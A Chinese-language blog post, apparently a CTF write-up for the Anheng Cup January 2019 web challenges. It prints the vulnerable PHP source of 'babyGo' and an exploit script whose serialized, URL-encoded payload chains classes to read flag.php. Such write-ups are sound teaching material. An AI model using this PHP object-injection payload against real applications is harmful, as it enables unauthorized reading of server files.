wywwzjj's Blog

安恒杯 一月 web

字数统计: 471阅读时长: 2 min
2019/01/30 Share

babyGo

<?php  
@error_reporting(1);
include 'flag.php';
class baby {
protected $skyobj;
public $aaa;
public $bbb;
function __construct() {
$this->skyobj = new sec;
}
function __toString() {
if (isset($this->skyobj))
return $this->skyobj->read();
}
}

class cool {
public $filename;
public $nice;
public $amzing;
function read() {
$this->nice = unserialize($this->amzing);
$this->nice->aaa = $sth;
if($this->nice->aaa === $this->nice->bbb) {
$file = "./{$this->filename}";
if (file_get_contents($file)) {
return file_get_contents($file);
}
else {
return "you must be joking!";
}
}
}
}

class sec {
function read() {
return "it's so sec~~";
}
}

if (isset($_GET['data'])) {
$Input_data = unserialize($_GET['data']);
echo $Input_data;
}
else {
highlight_file("./index.php");
}
?>

一个简单的反序列化题。
注意到一个魔术方法 __toString(),当 echo $obj; 时会自动调用。
第三行的 include 'flag.php'; 想必 flag 就在这个文件里了。

$this->nice = unserialize($this->amzing);
$this->nice->aaa = $sth;
if($this->nice->aaa === $this->nice->bbb) {

只要满足这个 if 就能读到 flag.php

这里有两个思路,

  • amzing 直接为空,反序列化后nice依然为空,
    得到的 $this->nice->aaa$this->nice->bbb自然全为 null,所以 ===

  • this->bbb = &this->aaa,随便 aaa 怎么变。
    此处的 exp 为:

    $cc = new baby();
    $cc->bbb = &$cc->aaa;
    print_r(urlencode(serialize($cc)));
    /* O%3A4%3A%22baby%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00skyobj%22%3BO%3A3%3A%22s
    ec%22%3A0%3A%7B%7Ds%3A3%3A%22aaa%22%3BN%3Bs%3A3%3A%22bbb%22%3BR%3A3%3B%7D */

    exp

    class baby {
    protected $skyobj; // cool 对象
    public $aaa;
    public $bbb;
    public function __construct() {
    // $this->skyobj = new sec;
    $this->skyobj = new cool;
    $this->skyobj->filename = 'flag.php';
    //$this->skyobj->amzing = 'O%3A4%3A%22baby%22%3A3%3A.........';
    }
    }

    $bb = new baby();
    print_r(urlencode(serialize($bb)));

url 编码是必要的,避免特殊符号编码(%00丢失)引起的长度歧义,出现 Error at offset 错误

flag 在源代码里,记得查看。

simple php

这题其实没啥意思,漏洞的简单,拼凑不好玩,其中涉及到的 ThinkPHP 系列漏洞单独总结下。

CATALOG
  1. 1. babyGo
  2. 2. simple php